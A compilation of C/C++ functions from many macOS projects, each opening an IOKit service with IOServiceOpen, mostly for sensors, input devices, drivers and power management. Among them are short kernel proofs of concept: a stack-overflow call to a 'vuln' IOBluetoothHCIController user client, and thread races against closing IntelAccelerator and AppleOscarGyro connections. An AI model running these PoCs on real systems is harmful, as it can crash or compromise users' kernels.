kern_return_t SMCOpen(io_connect_t *conn, const char *serviceName)
{
kern_return_t result;
mach_port_t masterPort;
io_iterator_t iterator;
io_object_t device;
IOMasterPort(MACH_PORT_NULL, &masterPort);
CFMutableDictionaryRef matchingDictionary = IOServiceMatching(serviceName);
result = IOServiceGetMatchingServices(masterPort, matchingDictionary, &iterator);
if (result != kIOReturnSuccess)
{
//printf("Error: IOServiceGetMatchingServices() = %08x\n", result);
return 1;
}
device = IOIteratorNext(iterator);
IOObjectRelease((io_object_t)iterator);
if (device == 0)
{
//printf("Error: no SMC found\n");
return 1;
}
result = IOServiceOpen(device, mach_task_self(), 0, conn);
IOObjectRelease(device);
if (result != kIOReturnSuccess)
{
//printf("Error: IOServiceOpen() = %08x\n", result);
return 1;
}
return kIOReturnSuccess;
}
IOReturn IOAccelCreateAccelID(IOOptionBits options, IOAccelID * identifier)
{
IOReturn err;
if (!idConnect)
{
io_service_t
service = IORegistryEntryFromPath(kIOMasterPortDefault,
kIOServicePlane ":/IOResources/IODisplayWrangler");
if (service)
{
err = IOServiceOpen(service, mach_task_self(), 0, &idConnect);
IOObjectRelease(service);
}
}
if (!idConnect)
return (kIOReturnNotReady);
uint64_t inData[] = { options, *identifier };
uint64_t outData;
uint32_t outLen = 1;
err = IOConnectCallScalarMethod(idConnect, kAlloc,
inData, arrayCnt(inData),
&outData, &outLen);
*identifier = (IOAccelID) outData;
return (err);
}
io_connect_t connectSmartBatteryManager(uint32_t options, IOReturn *outret)
{
io_service_t smartbattman_entry = MACH_PORT_NULL;
io_connect_t manager_connect = MACH_PORT_NULL;
IOReturn ret;
smartbattman_entry = IOServiceGetMatchingService( MACH_PORT_NULL,
IOServiceNameMatching(kBatteryManagerName) );
if (MACH_PORT_NULL == smartbattman_entry) {
return MACH_PORT_NULL;
}
ret = IOServiceOpen( smartbattman_entry, /* service */
mach_task_self(), /* owning task */
options, /* type - kBatteryExclusiveAccessType or not*/
&manager_connect); /* connect */
if (outret) *outret = ret;
if(kIOReturnSuccess != ret) {
return MACH_PORT_NULL;
}
IOObjectRelease(smartbattman_entry);
return manager_connect;
}
int PCIDriver_setupDriver()
{
kern_return_t kern_result;
io_iterator_t iterator;
bool driverFound = false;
io_service_t local_driver_service;
// get services
kern_result = IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching(kPcmMsrDriverClassName), &iterator);
if (kern_result != KERN_SUCCESS) {
fprintf(stderr, "[error] IOServiceGetMatchingServices returned 0x%08x\n", kern_result);
return kern_result;
}
// find service
while ((local_driver_service = IOIteratorNext(iterator)) != IO_OBJECT_NULL) {
driverFound = true;
break;
}
if (driverFound == false) {
fprintf(stderr, "[error] No matching drivers found \"%s\".\n", kPcmMsrDriverClassName);
return KERN_FAILURE;
}
IOObjectRelease(iterator);
// connect to service
kern_result = IOServiceOpen(local_driver_service, mach_task_self(), 0, &PCIDriver_connect);
if (kern_result != KERN_SUCCESS) {
fprintf(stderr, "[error] IOServiceOpen returned 0x%08x\n", kern_result);
return kern_result;
}
return KERN_SUCCESS;
}
IOReturn IOAccelCreateSurface( io_service_t accelerator, UInt32 wID, eIOAccelSurfaceModeBits modebits,
IOAccelConnect *connect )
{
IOReturn kr;
io_connect_t window = MACH_PORT_NULL;
*connect = NULL;
/* Create a context */
kr = IOServiceOpen( accelerator,
mach_task_self(),
kIOAccelSurfaceClientType,
&window );
if( kr != kIOReturnSuccess)
{
return kr;
}
/* Set the window id */
uint64_t data[] = { wID, modebits };
kr = IOConnectCallScalarMethod(window, kIOAccelSurfaceSetIDMode,
data, arrayCnt(data), NULL, NULL);
if(kr != kIOReturnSuccess)
{
IOServiceClose(window);
return kr;
}
*connect = (IOAccelConnect) (uintptr_t) window;
return kIOReturnSuccess;
}
UIOHOOK_API long int hook_get_pointer_acceleration_multiplier() {
#if defined USE_IOKIT || defined USE_COREFOUNDATION
bool successful = false;
double multiplier;
#endif
long int value = -1;
#ifdef USE_IOKIT
if (!successful) {
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(kIOHIDSystemClass));
if (service) {
kern_return_t kren_ret = kIOReturnError;
io_connect_t connection;
kren_ret = IOServiceOpen(service, mach_task_self(), kIOHIDParamConnectType, &connection);
if (kren_ret == kIOReturnSuccess) {
// IOByteCount size = sizeof(multiplier);
kren_ret = IOHIDGetAccelerationWithKey(connection, CFSTR(kIOHIDMouseAccelerationType), &multiplier);
if (kren_ret == kIOReturnSuccess) {
// Calculate the greatest common factor.
unsigned long denominator = 1000000, d = denominator;
unsigned long numerator = multiplier * denominator, gcf = numerator;
while (d != 0) {
unsigned long i = gcf % d;
gcf = d;
d = i;
}
value = denominator / gcf;
successful = true;
logger(LOG_LEVEL_INFO, "%s [%u]: IOHIDGetAccelerationWithKey: %li.\n",
__FUNCTION__, __LINE__, value);
}
}
}
}
#endif
#ifdef USE_COREFOUNDATION
if (!successful) {
CFTypeRef pref_val = CFPreferencesCopyValue(CFSTR("com.apple.mouse.scaling"), kCFPreferencesAnyApplication, kCFPreferencesCurrentUser, kCFPreferencesAnyHost);
if (pref_val != NULL && CFGetTypeID(pref_val) == CFNumberGetTypeID()) {
if (CFNumberGetValue((CFNumberRef) pref_val, kCFNumberSInt32Type, &multiplier)) {
value = (long) multiplier;
logger(LOG_LEVEL_INFO, "%s [%u]: CFPreferencesCopyValue: %li.\n",
__FUNCTION__, __LINE__, value);
}
}
}
#endif
return value;
}
kern_return_t
CPUTemp::SMCOpen(void)
{
kern_return_t result;
io_iterator_t iterator;
io_object_t device;
CFMutableDictionaryRef matchingDictionary = IOServiceMatching("AppleSMC");
result = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDictionary, &iterator);
if (result != kIOReturnSuccess)
{
printf("Error: IOServiceGetMatchingServices() = %08x\n", result);
return 1;
}
device = IOIteratorNext(iterator);
IOObjectRelease(iterator);
if (device == 0)
{
printf("Error: no SMC found\n");
return 1;
}
result = IOServiceOpen(device, mach_task_self(), 0, &conn);
IOObjectRelease(device);
if (result != kIOReturnSuccess)
{
printf("Error: IOServiceOpen() = %08x\n", result);
return 1;
}
return kIOReturnSuccess;
}
/*
===============
IN_GetIOHandle
===============
*/
static io_connect_t IN_GetIOHandle( void ) // mac os x mouse accel hack
{
io_connect_t iohandle = MACH_PORT_NULL;
kern_return_t status;
io_service_t iohidsystem = MACH_PORT_NULL;
mach_port_t masterport;
status = IOMasterPort( MACH_PORT_NULL, &masterport );
if ( status != KERN_SUCCESS )
{
return 0;
}
iohidsystem = IORegistryEntryFromPath( masterport, kIOServicePlane ":/IOResources/IOHIDSystem" );
if ( !iohidsystem )
{
return 0;
}
status = IOServiceOpen( iohidsystem, mach_task_self(), kIOHIDParamConnectType, &iohandle );
IOObjectRelease( iohidsystem );
return iohandle;
}
static io_connect_t connect_to_keystore(void)
{
io_registry_entry_t apple_key_bag_service;
kern_return_t result;
io_connect_t keystore = MACH_PORT_NULL;
apple_key_bag_service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching(kAppleKeyStoreServiceName));
if (apple_key_bag_service == IO_OBJECT_NULL) {
fprintf(stderr, "Failed to get service.\n");
return keystore;
}
result = IOServiceOpen(apple_key_bag_service, mach_task_self(), 0, &keystore);
if (KERN_SUCCESS != result)
fprintf(stderr, "Failed to open keystore\n");
if (keystore != MACH_PORT_NULL) {
IOReturn kernResult = IOConnectCallMethod(keystore,
kAppleKeyStoreUserClientOpen, NULL, 0, NULL, 0, NULL, NULL,
NULL, NULL);
if (kernResult) {
fprintf(stderr, "Failed to open AppleKeyStore: %x\n", kernResult);
}
}
return keystore;
}
int main(int argc, char** argv) {
char* service_name = "IntelAccelerator";
int client_type = 4;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(service_name));
if (service == MACH_PORT_NULL) {
printf("can't find service\n");
return 0;
}
IOServiceOpen(service, mach_task_self(), client_type, &conn);
if (conn == MACH_PORT_NULL) {
printf("can't connect to service\n");
return 0;
}
pthread_t t;
io_connect_t arg = conn;
pthread_create(&t, NULL, (void*) go, (void*) &arg);
usleep(100000);
start = 1;
close_it(conn);
pthread_join(t, NULL);
return 0;
}
io_connect_t get_event_driver(void){
static mach_port_t sEventDrvrRef = 0;
mach_port_t masterPort, service, iter;
kern_return_t kr;
if (!sEventDrvrRef)
{
// Get master device port
kr = IOMasterPort( bootstrap_port, &masterPort );
check( KERN_SUCCESS == kr);
kr = IOServiceGetMatchingServices( masterPort, IOServiceMatching(
kIOHIDSystemClass ), &iter );
check( KERN_SUCCESS == kr);
service = IOIteratorNext( iter );
check( service );
kr = IOServiceOpen( service, mach_task_self(),
kIOHIDParamConnectType, &sEventDrvrRef );
check( KERN_SUCCESS == kr );
IOObjectRelease( service );
IOObjectRelease( iter );
}
return sEventDrvrRef;
}
int main(int argc, char** argv) {
char* service_name = "AppleOscarGyro";
int client_type = 0;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(service_name));
if (service == MACH_PORT_NULL) {
printf("can't find service\n");
return 0;
}
IOServiceOpen(service, mach_task_self(), client_type, &conn);
if (conn == MACH_PORT_NULL) {
printf("can't connect to service\n");
return 0;
}
OSSpinLockLock(&lock);
pthread_t t;
io_connect_t arg = conn;
pthread_create(&t, NULL, (void*) go, (void*) &arg);
usleep(100000);
OSSpinLockUnlock(&lock);
close_it(conn);
pthread_join(t, NULL);
return 0;
}
/* Open and Close */
NXEventHandle NXOpenEventStatus(void)
{
NXEventHandle handle = MACH_PORT_NULL;
register kern_return_t kr;
io_service_t service = MACH_PORT_NULL;
mach_port_t masterPort;
do {
kr = IOMasterPort( MACH_PORT_NULL, &masterPort );
if( kr != KERN_SUCCESS)
break;
service = IORegistryEntryFromPath( masterPort,
kIOServicePlane ":/IOResources/IOHIDSystem" );
if( !service)
break;
kr = IOServiceOpen( service,
mach_task_self(),
kIOHIDParamConnectType,
&handle);
IOObjectRelease( service );
} while( false );
return( handle );
}
io_connect_t open_and_connect_user_client(char* service_name, int type) {
kern_return_t err;
io_connect_t conn = MACH_PORT_NULL;
CFMutableDictionaryRef matching = IOServiceMatching("IOGraphicsAccelerator2");
if(!matching){
printf("unable to create service matching dictionary\n");
return conn;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return conn;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return conn;
}
printf("got service: %x\n", service);
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return MACH_PORT_NULL;
}
//getchar();
printf("got userclient connection: %x\n", conn);
return conn;
}
void printMsgBuffer(io_service_t service)
{
kern_return_t ret;
io_connect_t connect = 0;
#if __LP64__
mach_vm_address_t address;
mach_vm_size_t size;
#else
vm_address_t address;
vm_size_t size;
#endif
ret = IOServiceOpen(service, mach_task_self(), 0, &connect);
if (ret != KERN_SUCCESS) {
printf("error: IOServiceOpen returned 0x%08x\n", ret);
goto failure;
}
ret = IOConnectMapMemory(connect, kVoodooHDAMemoryMessageBuffer, mach_task_self(), &address, &size,
kIOMapAnywhere | kIOMapDefaultCache);
if (ret != kIOReturnSuccess) {
printf("error: IOConnectMapMemory returned 0x%08x\n", ret);
goto failure;
}
printf("%s\n", (char *) address);
failure:
if (connect) {
ret = IOServiceClose(connect);
if (ret != KERN_SUCCESS)
printf("warning: IOServiceClose returned 0x%08x\n", ret);
}
}
io_connect_t getDataPort(void)
{
kern_return_t kr;
io_service_t serviceObject;
if (dataPort) return dataPort;
// Look up a registered IOService object whose class is AppleLMUController
serviceObject = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleLMUController"));
if (!serviceObject)
{
printf("getLightSensors() error: failed to find ambient light sensor\n");
return 0;
}
// Create a connection to the IOService object
kr = IOServiceOpen(serviceObject, mach_task_self(), 0, &dataPort);
IOObjectRelease(serviceObject);
if (kr != KERN_SUCCESS)
{
printf("getLightSensors() error: failed to open IoService object\n");
return 0;
}
return dataPort;
}
void matched_callback(io_iterator_t iterator) {
bool connected = false;
while (auto service = IOIteratorNext(iterator)) {
std::lock_guard<std::mutex> guard(connect_mutex_);
// Use first matched service.
if (!service_) {
service_ = service;
IOObjectRetain(service_);
auto kr = IOServiceOpen(service_, mach_task_self(), kIOHIDServerConnectType, &connect_);
if (kr != KERN_SUCCESS) {
logger_.error("IOServiceOpen error: {1} @ {0}", __PRETTY_FUNCTION__, kr);
connect_ = IO_OBJECT_NULL;
}
logger_.info("IOServiceOpen is succeeded @ {0}", __PRETTY_FUNCTION__);
connected = true;
}
IOObjectRelease(service);
}
// We have to call callback after connect_mutex_ is unlocked.
if (connected && connected_callback_) {
connected_callback_(*this);
}
}
static int darwin_init(void)
{
kern_return_t err;
/* Note the actual security happens in the kernel module.
* This check is just candy to be able to get nicer output
*/
if (getuid() != 0) {
/* Fun's reserved for root */
errno = EPERM;
return -1;
}
/* Get the DirectHW driver service */
iokit_uc = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("DirectHWService"));
if (!iokit_uc) {
printf("DirectHW.kext not loaded.\n");
errno = ENOSYS;
return -1;
}
/* Create an instance */
err = IOServiceOpen(iokit_uc, mach_task_self(), 0, &connect);
/* Should not go further if error with service open */
if (err != KERN_SUCCESS) {
printf("Could not create DirectHW instance.\n");
errno = ENOSYS;
return -1;
}
return 0;
}
// Opens HID service. Returns kIOReturnSuccess on success.
static int open_iohid(io_connect_t* connection){
io_iterator_t iter;
io_service_t service;
// Open master port (if not done yet)
static mach_port_t master = 0;
kern_return_t res;
if(!master && (res = IOMasterPort(bootstrap_port, &master)) != kIOReturnSuccess){
master = 0;
ckb_err("Unable to open master port: 0x%08x\n", res);
goto failure;
}
// Open the HID service
if((res = IOServiceGetMatchingServices(master, IOServiceMatching(kIOHIDSystemClass), &iter)) != kIOReturnSuccess)
goto failure;
service = IOIteratorNext(iter);
if(!service){
res = kIOReturnNotOpen;
goto failure_release_iter;
}
if((res = IOServiceOpen(service, mach_task_self(), kIOHIDParamConnectType, connection)) != kIOReturnSuccess){
*connection = 0;
goto failure_release_iter;
}
// Finished; release objects and return success
IOObjectRelease(service);
failure_release_iter:
IOObjectRelease(iter);
failure:
return res;
}
int inputopen(usbdevice* kb){
// Open master port (if not done yet)
static mach_port_t master = 0;
kern_return_t res;
if(!master&& (res = IOMasterPort(bootstrap_port, &master)) != KERN_SUCCESS){
master = 0;
printf("Unable to open master port: 0x%08x\n", res);
return 0;
}
// Open an HID service
io_iterator_t iter;
if((res = IOServiceGetMatchingServices(master, IOServiceMatching(kIOHIDSystemClass), &iter)) != KERN_SUCCESS){
printf("Unable to get input service iterator: 0x%08x\n", res);
return 0;
}
if((res = IOServiceOpen(IOIteratorNext(iter), mach_task_self(), kIOHIDParamConnectType, &kb->event)) != KERN_SUCCESS){
IOObjectRelease(iter);
printf("Unable to open IO service: 0x%08x\n", res);
kb->event = 0;
return 0;
}
IOObjectRelease(iter);
clearkeys(kb);
return 1;
}
void enkript_prologue(void)
{
if (IOConnectCallMethod == NULL) die("IOConnectCallMethod unavailable, require version >= 10.5");
/* get iterator to browse drivers of the chosen class
*/
io_iterator_t iterator;
if (IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("com_enkript_driver_Service"), &iterator) != KERN_SUCCESS) die("IOServiceGetMatchingServices failed");
/* browse drivers
*/
for (io_service_t service = IOIteratorNext(iterator); service != IO_OBJECT_NULL; service = IOIteratorNext(iterator))
{
debug("com_enkript_driver_Service instance found!");
/* open service
*/
io_connect_t connect = IO_OBJECT_NULL;
if (IOServiceOpen(service, mach_task_self(), 0, &connect) != KERN_SUCCESS) die("IOServiceOpen failed");
/* call driver's open method
*/
if (IOConnectCallMethod(connect, 0 /* open, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
/* call driver's hello method
*/
uint64_t buf = getpid();
if (IOConnectCallMethod(connect, 2 /* hello, TOFIX */, &buf, 1, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
/* call driver's close method
*/
if (IOConnectCallMethod(connect, 1 /* close, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
/* close service
*/
if (IOServiceClose(connect) != KERN_SUCCESS) die("IOServiceClose failed");
}
IOObjectRelease(iterator);
}
/**
* Opens the IOKit service, instantiating org_virtualbox_SupDrvClient.
*
* @returns VBox status code.
*/
static int suplibDarwinOpenService(PSUPLIBDATA pThis)
{
/*
* Open the IOKit client first - The first step is finding the service.
*/
mach_port_t MasterPort;
kern_return_t kr = IOMasterPort(MACH_PORT_NULL, &MasterPort);
if (kr != kIOReturnSuccess)
{
LogRel(("IOMasterPort -> %d\n", kr));
return VERR_GENERAL_FAILURE;
}
CFDictionaryRef ClassToMatch = IOServiceMatching(IOCLASS_NAME);
if (!ClassToMatch)
{
LogRel(("IOServiceMatching(\"%s\") failed.\n", IOCLASS_NAME));
return VERR_GENERAL_FAILURE;
}
/* Create an io_iterator_t for all instances of our drivers class that exist in the IORegistry. */
io_iterator_t Iterator;
kr = IOServiceGetMatchingServices(MasterPort, ClassToMatch, &Iterator);
if (kr != kIOReturnSuccess)
{
LogRel(("IOServiceGetMatchingServices returned %d\n", kr));
return VERR_GENERAL_FAILURE;
}
/* Get the first item in the iterator and release it. */
io_service_t ServiceObject = IOIteratorNext(Iterator);
IOObjectRelease(Iterator);
if (!ServiceObject)
{
LogRel(("SUP: Couldn't find any matches. The kernel module is probably not loaded.\n"));
return VERR_VM_DRIVER_NOT_INSTALLED;
}
/*
* Open the service.
*
* This will cause the user client class in SUPDrv-darwin.cpp to be
* instantiated and create a session for this process.
*/
io_connect_t Connection = NULL;
kr = IOServiceOpen(ServiceObject, mach_task_self(), SUP_DARWIN_IOSERVICE_COOKIE, &Connection);
IOObjectRelease(ServiceObject);
if (kr != kIOReturnSuccess)
{
LogRel(("SUP: IOServiceOpen returned %d. Driver open failed.\n", kr));
pThis->uConnection = 0;
return VERR_VM_DRIVER_OPEN_ERROR;
}
AssertCompile(sizeof(pThis->uConnection) >= sizeof(Connection));
pThis->uConnection = Connection;
return VINF_SUCCESS;
}
void reset_baseband() {
printf("Resetting baseband\n");
io_connect_t connect = 0;
CFMutableDictionaryRef match = IOServiceMatching("AppleBaseband");
io_service_t service = IOServiceGetMatchingService(0, match);
IOServiceOpen(service, mach_task_self(), 0, &connect);
IOConnectCallScalarMethod(connect, 0, 0, 0, 0, 0);
IOServiceClose(connect);
sleep(1);
}
void resetBaseband() {
LOG(LOGLEVEL_INFO, "Resetting baseband...\n");
mach_port_t masterPort;
kern_return_t result = IOMasterPort(MACH_PORT_NULL, &masterPort);
CFMutableDictionaryRef matchingDict = IOServiceMatching("AppleBaseband");
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matchingDict);
io_connect_t conn;
result = IOServiceOpen(service, mach_task_self(), 0, &conn);
result = IOConnectCallScalarMethod(conn, 0, 0, 0, 0, 0);
IOServiceClose(conn);
}
int OpenDataPort(char *DriverClassName, io_connect_t *DataPort)
{
kern_return_t kernResult;
mach_port_t masterPort;
io_service_t serviceObject;
io_connect_t dataPort;
io_iterator_t iterator;
CFDictionaryRef classToMatch;
kernResult = IOMasterPort(MACH_PORT_NULL, &masterPort);
if (kernResult != KERN_SUCCESS)
{
syslog(LOG_ERR, "OpenDataPort: IOMasterPort Failed. %d\n", kernResult);
return kernResult;
}
classToMatch = IOServiceMatching(DriverClassName);
if (classToMatch == NULL)
{
syslog(LOG_ERR, "OpenDataPort: IOServiceMatching returned a NULL dictionary.");
return -1;
}
kernResult = IOServiceGetMatchingServices(masterPort, classToMatch, &iterator);
if (kernResult != KERN_SUCCESS)
{
syslog(LOG_ERR, "OpenDataPort: IOServiceGetMatchingServices Failed %d\n", kernResult);
return kernResult;
}
serviceObject = IOIteratorNext(iterator);
IOObjectRelease(iterator);
if (!serviceObject)
{
syslog(LOG_ERR, "OpenDataPort: Couldn't find any matches.");
return kernResult;
}
kernResult = IOServiceOpen(serviceObject, mach_task_self(), 0, &dataPort);
IOObjectRelease(serviceObject);
if (kernResult != KERN_SUCCESS)
{
syslog(LOG_ERR, "OpenDataPort: IOServiceOpen Failed %d\n", kernResult);
return kernResult;
}
*DataPort = dataPort;
return 0;
}
io_connect_t IORegisterForSystemPower ( void * refcon,
IONotificationPortRef * thePortRef,
IOServiceInterestCallback callback,
io_object_t * root_notifier )
{
io_connect_t fb = IO_OBJECT_NULL;
IONotificationPortRef notify = NULL;
kern_return_t kr;
io_service_t obj = IO_OBJECT_NULL;
*root_notifier = IO_OBJECT_NULL;
notify = IONotificationPortCreate(MACH_PORT_NULL);
obj = IORegistryEntryFromPath( IO_OBJECT_NULL,
kIOPowerPlane ":/IOPowerConnection/IOPMrootDomain");
if( obj == IO_OBJECT_NULL) goto failure_exit;
kr = IOServiceOpen( obj,mach_task_self(), 0, &fb);
if ( (kr != kIOReturnSuccess) || (fb == IO_OBJECT_NULL) ) {
goto failure_exit;
}
kr = IOServiceAddInterestNotification(
notify,obj,kIOAppPowerStateInterest,
callback,refcon,root_notifier);
IOObjectRelease(obj);
if ( kr == KERN_SUCCESS ) {
// Successful exit case
*thePortRef = notify;
return fb;
}
failure_exit:
if ( obj != IO_OBJECT_NULL) {
IOObjectRelease(obj);
}
if ( notify != NULL) {
IONotificationPortDestroy(notify);
}
if ( fb != IO_OBJECT_NULL) {
IOServiceClose(fb);
}
if ( *root_notifier != IO_OBJECT_NULL) {
IOObjectRelease(*root_notifier);
}
return IO_OBJECT_NULL;
}
kern_return_t SMCOpen(void)
{
kern_return_t result;
mach_port_t masterPort;
io_iterator_t iterator;
io_object_t device;
result = IOMasterPort(MACH_PORT_NULL, &masterPort);
CFMutableDictionaryRef matchingDictionary = IOServiceMatching("AppleSMC");
result = IOServiceGetMatchingServices(masterPort, matchingDictionary, &iterator);
if (result != kIOReturnSuccess)
{
printf("Error: IOServiceGetMatchingServices() = %08x\n", result);
return 1;
}
device = IOIteratorNext(iterator);
IOObjectRelease(iterator);
if (device == 0)
{
printf("Error: no SMC found\n");
return 1;
}
result = IOServiceOpen(device, mach_task_self(), 0, &conn);
IOObjectRelease(device);
if (result != kIOReturnSuccess)
{
printf("Error: IOServiceOpen() = %08x\n", result);
return 1;
}
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert) {
CFTypeRef CFProductData = IORegistryEntryCreateCFProperty(platformExpert,
CFSTR("product-name"),
kCFAllocatorDefault, 0);
if (CFProductData) {
CFIndex length = CFDataGetLength((CFDataRef)CFProductData);
char buffer[length];
CFDataGetBytes((CFDataRef) CFProductData, CFRangeMake(0,length), (UInt8*)buffer);
CFRelease(CFProductData);
modelNo = *new std::string(buffer);
}
IOObjectRelease(platformExpert);
}
return kIOReturnSuccess;
}
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
a.sizes[0] = 0x1000;
a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));
/* This arguments overflows a local buffer and the adjacent stack canary */
a.sizes[1] = 264;
a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
memset((void *)a.args[1], 'A', a.sizes[1]);
/* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
a.index = 0x2d;
/* Debug */
for(int i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
fflush(stdout);
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
// On Dual-GPU Macbook Pros, Apple's Screensaver Engine
// will detect any GPU change and call stopAnimation,
// then initWithFrame and startAnimation.
//
// When we launch boincscr or a project screensaver
// app which uses OpenGL, that will trigger a switch to
// the discrete GPU, causing the Screensaver Engine to
// call stopAnimation, which will then shut down boincscr
// or the project screensaver. This will then release
// the discrete GPU, triggering a switch to the intrinsic
// GPU, which will again cause a call to stopAnimation,
// and so forth in an infinite loop.
//
// The solution is to request the discrete GPU ourselves
// before launching boincscr or a project screensaver so
// the OpenGL app does not cause a GPU switch.
//
// We initially call this with setDiscrete = false to
// test whether we are running on a Dual-GPU Macbook Pro.
//
void CScreensaver::SetDiscreteGPU(bool setDiscrete) {
kern_return_t kernResult = 0;
io_service_t service = IO_OBJECT_NULL;
if (GPUSelectConnect == IO_OBJECT_NULL) {
service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleGraphicsControl"));
if (service != IO_OBJECT_NULL) {
kernResult = IOServiceOpen(service, mach_task_self(), setDiscrete ? 1 : 0, &GPUSelectConnect);
if (kernResult == KERN_SUCCESS) {
IsDualGPUMacbook = true;
}
}
}
}
static void ks_service_matching_callback(void *refcon, io_iterator_t iterator)
{
io_object_t obj = IO_OBJECT_NULL;
while ((obj = IOIteratorNext(iterator))) {
kern_return_t ret = IOServiceOpen(obj, mach_task_self(), 0,
(io_connect_t*)refcon);
if (ret) {
asl_log(NULL, NULL, ASL_LEVEL_ERR,
"IOServiceOpen() failed: %d", ret);
}
IOObjectRelease(obj);
}
}
